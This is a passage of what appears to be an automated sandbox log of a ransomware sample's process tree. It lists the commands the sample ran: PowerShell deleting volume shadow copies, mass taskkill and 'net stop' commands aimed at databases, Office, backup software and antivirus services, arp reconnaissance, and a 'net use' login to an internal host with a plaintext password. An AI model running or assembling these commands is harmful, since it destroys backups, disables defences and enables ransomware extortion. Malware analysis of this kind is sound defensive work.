- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
  2⤵
  PID:11836
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM oracle.exe /f
  2⤵
  - Kills process with taskkill
  PID:11820
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /f
  2⤵
  PID:11808
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysql.exe /f
  2⤵
  - Kills process with taskkill
  PID:11796
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqld.exe /f
  2⤵
  PID:11784
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sql.exe /f
  2⤵
  PID:11772
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM 1cv8.exe /f
  2⤵
  - Kills process with taskkill
  PID:11760
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM rphost.exe /f
  2⤵
  - Kills process with taskkill
  PID:11748
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM rmngr.exe /f
  2⤵
  PID:11732
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ragent.exe /f
  2⤵
  PID:11720
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM synctime.exe /F
  2⤵
  PID:11704
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlservr.exe /F
  2⤵
  PID:11692
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlbrowser.exe /F
  2⤵
  - Kills process with taskkill
  PID:11676
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlagent.exe /F
  2⤵
  - Kills process with taskkill
  PID:11660
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM oracle.exe /F
  2⤵
  - Kills process with taskkill
  PID:11648
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ocssd.exe /F
  2⤵
  PID:11640
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ocautoupds.exe /F
  2⤵
  PID:11632
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld-opt.exe /F
  2⤵
  PID:11624
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM wordpad.exe /F
  2⤵
  PID:11616
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld-nt.exe /F
  2⤵
  - Kills process with taskkill
  PID:11604
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM winword.exe /F
  2⤵
  - Kills process with taskkill
  PID:11592
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  PID:11576
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM visio.exe /F
  2⤵
  PID:11564
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  PID:11552
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM powerpnt.exe /F
  2⤵
  PID:11540
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM msftesql.exe /F
  2⤵
  PID:11528
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM tmlisten.exe /F
  2⤵
  - Kills process with taskkill
  PID:11516
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM outlook.exe /F
  2⤵
  PID:11504
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM msaccess.exe /F
  2⤵
  - Kills process with taskkill
  PID:11496
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM PccNTMon.exe /F
  2⤵
  PID:11488
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM onenote.exe /F
  2⤵
  - Kills process with taskkill
  PID:11428
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM isqlplussvc.exe /F
  2⤵
  - Kills process with taskkill
  PID:11420
- C:\Windows\SYSTEM32\arp.exe
  "arp" -a
  2⤵
  PID:16680
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  PID:11108
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM xfssvccon.exe /F
  2⤵
  - Kills process with taskkill
  PID:11096
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM dbsnmp.exe /F
  2⤵
  - Kills process with taskkill
  PID:10920
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" IM thunderbird.exe /F
  2⤵
  PID:10756
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM zoolz.exe /F
  2⤵
  - Kills process with taskkill
  PID:10748
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.11 /USER:
  2⤵
  PID:14848
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.11 /USER:ragulin Steel_Rat_2020
  2⤵
  PID:9472
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mbamtray.exe /F
  2⤵
  PID:10740
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM infopath.exe /F
  2⤵
  - Kills process with taskkill
  PID:10732
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ocomm.exe /F
  2⤵
  PID:10724
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM thebat64.exe /F
  2⤵
  PID:10716
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM dbeng50.exe /F
  2⤵
  PID:10708
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM tbirdconfig.exe /F
  2⤵
  - Kills process with taskkill
  PID:10700
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlwriter.exe /F
  2⤵
  PID:10692
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM CNTAoSMgr.exe /F
  2⤵
  PID:10684
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM excel.exe /F
  2⤵
  - Kills process with taskkill
  PID:10676
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM encsvc.exe /F
  2⤵
  - Kills process with taskkill
  PID:10668
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM steam.exe /F
  2⤵
  - Kills process with taskkill
  PID:10660
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM thebat.exe /F
  2⤵
  PID:10652
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM agntsvc.exe /F
  2⤵
  PID:10616
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM firefoxconfig.exe /F
  2⤵
  - Kills process with taskkill
  PID:10604
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqbcoreservice.exe /F
  2⤵
  PID:10592
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /F
  2⤵
  PID:10584
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  PID:10576
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  PID:10568
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  PID:10560
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$VEEAMSQL2008R2 /y
  2⤵
  PID:10268
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ekrn /y
  2⤵
  PID:7948
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$SQLEXPRESS /y
  2⤵
  PID:7940
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop stc_raw_agent /y
  2⤵
  PID:7924
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop zhudongfangyu /y
  2⤵
  PID:7908
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop YooIT /y
  2⤵
  PID:7900
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop YooBackup /y
  2⤵
  PID:7892
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBCFMonitorService /y
  2⤵
  PID:7876
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop Intuit.QuickBooks.FCS /y
  2⤵
  PID:7864
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop vapiendpoint /y
  2⤵
  PID:7820
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop mssql$vim_sqlexp /y
  2⤵
  PID:7812
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop WRSVC /y
  2⤵
  PID:7796
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLTELEMETRY$ECWDB2 /y
  2⤵
  PID:7780
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamRESTSvc /y
    3⤵
    PID:7492
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop TrueKeyServiceHelper /y
  2⤵
  PID:7772
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLTELEMETRY /y
  2⤵
  PID:7756
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop TrueKeyScheduler /y
  2⤵
  PID:7748
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLSERVERAGENT /y
  2⤵
  PID:7732
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop TrueKey /y
  2⤵
  PID:7724
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLSafeOLRService /y
  2⤵
  PID:7704
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop tmlisten /y
  2⤵
  PID:7696
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLBrowser /y
  2⤵
  PID:7680
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop TmCCSF /y
  2⤵
  PID:7672
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$VEEAMSQL2012 /y
  2⤵
  PID:7660
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop swi_update_64 /y
  2⤵
  PID:7648
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
  2⤵
  PID:7640
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop swi_update /y
  2⤵
  PID:7624
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$TPSAMA /y
  2⤵
  PID:7616
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop swi_service /y
  2⤵
  PID:7600
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop swi_filter /y
  2⤵
  PID:7584
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$SYSTEM_BGC /y
  2⤵
  PID:7568
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop svcGenericHost /y
  2⤵
  PID:7560
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$SQLEXPRESS /y
  2⤵
  PID:7552
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$SOPHOS /y
  2⤵
  PID:7544
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$SQL_2008 /y
  2⤵
  PID:7536
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop sophossps /y
  2⤵
  PID:7528
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$SHAREPOINT /y
  2⤵
  PID:7520
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SntpService /y
  2⤵
  PID:7512
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$SBSMONITORING /y
  2⤵
  PID:7500
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SmcService /y
  2⤵
  PID:7492
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$PROFXENGAGEMENT /y
  2⤵
  PID:7484
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop Smcinst /y
  2⤵
  PID:7476
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$PROD /y
  2⤵
  PID:7468
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ShMonitor /y
  2⤵
  PID:7460
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$PRACTTICEMGT /y
  2⤵
  PID:7452
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SepMasterService /y
  2⤵
  PID:7444
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$PRACTTICEBGC /y
  2⤵
  PID:7436
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SAVService /y
  2⤵
  PID:7428
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$ECWDB2 /y
  2⤵
  PID:7420
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SAVAdminService /y
  2⤵
  PID:7412
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$CXDB /y
  2⤵
  PID:7404
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop sacsvr /y
  2⤵
  PID:7396
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$CITRIX_METAFRAME /y
  2⤵
  PID:7388
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$SOPHOS /y
  2⤵
  PID:7380
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$BKUPEXEC /y
  2⤵
  PID:7364
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop sms_site_sql_backup /y
  2⤵
  PID:7356
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop mfevtp /y
  2⤵
  PID:7348
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop RESvc /y
  2⤵
  PID:7340
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop wbengine /y
  2⤵
  PID:7332
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop mfemms /y
  2⤵
  PID:7324
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ReportServer$SQL_2008 /y
  2⤵
  PID:7316
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop wbengine /y
  2⤵
  PID:7308
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop mfefire /y
  2⤵
  PID:7300
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop OracleClientCache80 /y
  2⤵
  PID:7292
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamTransportSvc /y
  2⤵
  PID:7284
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop McTaskManager /y
  2⤵
  PID:7276
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MySQL80 /y
  2⤵
  PID:7268
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamRESTSvc /y
  2⤵
  PID:7260
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop McShield /y
  2⤵
  PID:7252
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MySQL57 /y
  2⤵
  PID:7244
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamNFSSvc /y
  2⤵
  PID:7236
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop McAfeeFrameworkMcAfeeFramework /y
  2⤵
  PID:7228
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQLServerOLAPService /y
  2⤵
  PID:7220
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamMountSvc /y
  2⤵
  PID:7212
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop McAfeeFramework /y
  2⤵
  PID:7204
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQLServerADHelper100 /y
  2⤵
  PID:7196
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamHvIntegrationSvc /y
  2⤵
  PID:7188
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop McAfeeEngineService /y
  2⤵
  PID:7180
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQLServerADHelper /y
  2⤵
  PID:7172
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamEnterpriseManagerSvc /y
  2⤵
  PID:7164
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MBEndpointAgent /y
  2⤵
  PID:7156
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQLSERVER /y
  2⤵
  PID:7148
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamDeploySvc /y
  2⤵
  PID:7140
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MBAMService /y
  2⤵
  PID:7132
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQLFDLauncher$TPSAMA /y
  2⤵
  PID:7124
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamDeploymentService /y
  2⤵
  PID:7116
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop masvc /y
  2⤵
  PID:7108
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQLFDLauncher$TPS /y
  2⤵
  PID:7092
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamCloudSvc /y
  2⤵
  PID:7084
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop macmnsvc /y
  2⤵
  PID:7076
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y
  2⤵
  PID:7060
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamCatalogSvc /y
  2⤵
  PID:7052
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop klnagent /y
  2⤵
  PID:7044
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQLFDLauncher$SQL_2008 /y
  2⤵
  PID:7028
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamBrokerSvc /y
  2⤵
  PID:7020
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop kavfsslp /y
  2⤵
  PID:7004
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQLFDLauncher$SHAREPOINT /y
  2⤵
  PID:6996
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamBackupSvc /y
  2⤵
  PID:6980
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop KAVFSGT /y
  2⤵
  PID:6972
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQLFDLauncher$SBSMONITORING /y
  2⤵
  PID:6956
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLWriter /y
  2⤵
  PID:6940
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop KAVFS /y
  2⤵
  PID:6932
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y
  2⤵
  PID:6916
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
  2⤵
  PID:6908
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop FA_Scheduler /y
  2⤵
  PID:6892
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$VEEAMSQL2012 /y
  2⤵
  PID:6876
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SDRSVC /y
  2⤵
  PID:6868
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ESHASRV /y
  2⤵
  PID:6852
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$VEEAMSQL2008R2 /y
  2⤵
  PID:6844
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop PDVFSService /y
  2⤵
  PID:6828
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop EsgShKernel /y
  2⤵
  PID:6820
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$TPSAMA /y
  2⤵
  PID:6812
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ntrtscan /y
  2⤵
  PID:6804
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop EPUpdateService /y
  2⤵
  PID:6796
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$TPS /y
  2⤵
  PID:6788
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop DCAgent /y
  2⤵
  PID:6780
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$SHAREPOINT /y
  2⤵
  PID:6772
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecVSSProvider /y
  2⤵
  PID:6764
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AVP /y
  2⤵
  PID:6756
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$SBSMONITORING /y
  2⤵
  PID:6748
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$SBSMONITORING /
  2⤵
  PID:6740
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecRPCService /y
  2⤵
  PID:6732
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop Antivirus /y
  2⤵
  PID:6724
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$PROFXENGAGEMENT /y
  2⤵
  PID:6716
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecManagementService /y
  2⤵
  PID:6708
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AcronisAgent /y
  2⤵
  PID:6700
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$PROD /y
  2⤵
  PID:6692
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecJobEngine /y
  2⤵
  PID:6684
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos Web Control Service” /y
  2⤵
  PID:6676
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$PRACTTICEBGC /y
  2⤵
  PID:6668
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecDeviceMediaService /y
  2⤵
  PID:6660
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos System Protection Service” /y
  2⤵
  PID:6652
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$PRACTICEMGT /y
  2⤵
  PID:6644
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecAgentBrowser /y
  2⤵
  PID:6636
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos Safestore Service” /y
  2⤵
  PID:6628
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop audioendpointbuilder /y
  2⤵
  PID:6620
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$ECWDB2 /y
  2⤵
  PID:6612
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecAgentAccelerator /y
  2⤵
  PID:6604
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos Message Router” /y
  2⤵
  PID:6596
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop unistoresvc_1af40a /y
  2⤵
  PID:6588
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$BKUPEXEC /y
  2⤵
  PID:6580
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ARSM /y
  2⤵
  PID:6572
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos MCS Client” /y
  2⤵
  PID:6564
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop msexchangeimap4 /y
  2⤵
  PID:6556
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “intel(r) proset monitoring service” /y
  2⤵
  PID:6540
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSOLAP$TPSAMA /y
  2⤵
  PID:6532
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AcrSch2Svc /y
  2⤵
  PID:6516
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos MCS Agent” /y
  2⤵
  PID:6508
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop msexchangeadtopology /y
  2⤵
  PID:6492
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “aphidmonitorservice” /y
  2⤵
  PID:6484
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSOLAP$TPS /y
  2⤵
  PID:6468
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Zoolz 2 Service” /y
  2⤵
  PID:6460
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ReportServer$TPSAMA /y
  2⤵
  PID:6444
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos Health Service” /y
  2⤵
  PID:6436
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSExchangeSRS /y
  2⤵
  PID:6420
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop W3Svc /y
  2⤵
  PID:6412
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSOLAP$SYSTEM_BGC /y
  2⤵
  PID:6396
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Veeam Backup Catalog Data Service” /y
  2⤵
  PID:6388
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ReportServer$TPS /y
  2⤵
  PID:6372
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos File Scanner Service” /y
  2⤵
  PID:6364
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSExchangeSA /y
  2⤵
  PID:6348
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop UI0Detect /y
  2⤵
  PID:6340
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSOLAP$SQL_2008 /y
  2⤵
  PID:6332
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop CAARCUpdateSvc /y
    3⤵
    PID:14184
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Symantec System Recovery” /y
  2⤵
  PID:6320
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ReportServer$SYSTEM_BGC /y
  2⤵
  PID:6312
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos Device Control Service” /y
  2⤵
  PID:6304
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSExchangeMTA /y
  2⤵
  PID:6296
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SstpSvc /y
  2⤵
  PID:6288
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop msftesql$PROD /y
  2⤵
  PID:6280
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “SQLsafe Filter Service” /y
  2⤵
  PID:6268
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y
    3⤵
    PID:13520
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ReportServer$SQL_2008 /y
  2⤵
  PID:6256
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SMTPSvc /y
  2⤵
  PID:6248
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos Clean Service” /y
  2⤵
  PID:6232
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSExchangeMGMT /y
  2⤵
  PID:6224
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop POP3Svc /y
  2⤵
  PID:6216
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MsDtsServer110 /y
  2⤵
  PID:6208
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “SQLsafe Backup Service” /y
  2⤵
  PID:6200
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ReportServer /y
  2⤵
  PID:6188
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SamSs /y
  2⤵
  PID:6180
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop EraserSvc11710 /y
    3⤵
    PID:7460
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos AutoUpdate Service” /y
  2⤵
  PID:6172
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSExchangeIS /y
  2⤵
  PID:6164
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop NetMsmqActivator /y
  2⤵
  PID:6156
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MsDtsServer100 /y
  2⤵
  PID:5744
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “SQL Backups /y
  2⤵
  PID:2684
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Enterprise Client Service” /y
  2⤵
  PID:5500
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MsDtsServer /y
  2⤵
  PID:3340
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Acronis VSS Provider” /y
  2⤵
  PID:3924
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop sophos /y
  2⤵
  PID:3172
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop CAARCUpdateSvc /y
  2⤵
  PID:5164
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop CASAD2DWebSvc /y
  2⤵
  PID:5276
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AcronisAgent /y
  2⤵
  PID:5180
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AcrSch2Svc /y
  2⤵
  PID:6116
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecRPCService /y
  2⤵
  PID:6032
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecManagementService /y
  2⤵
  PID:4712
